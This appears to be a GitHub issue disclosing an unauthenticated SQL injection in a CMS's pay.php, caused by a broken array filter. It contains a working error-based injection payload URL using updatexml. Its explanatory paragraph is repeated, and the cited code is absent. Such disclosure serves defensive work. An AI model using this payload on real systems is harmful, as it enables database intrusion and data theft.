You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Compared with the previous injection vulnerability, this vulnerability is more harmful because it can be triggered without logging in to the management account.
The syntax of the cms filter function is wrong, which causes the filter of the array to not take effect
in pay.php:
Compared with the previous injection vulnerability, this vulnerability is more harmful because it can be triggered without logging in to the management account.
The syntax of the cms filter function is wrong, which causes the filter of the array to not take effect
in pay.php:
payload:
http://192.168.0.105/?c=pay&a=cartadd&id=1&quantity=1&attribute[]=123123' or updatexml(2,concat(0x7e,(version())),0) or'
The text was updated successfully, but these errors were encountered: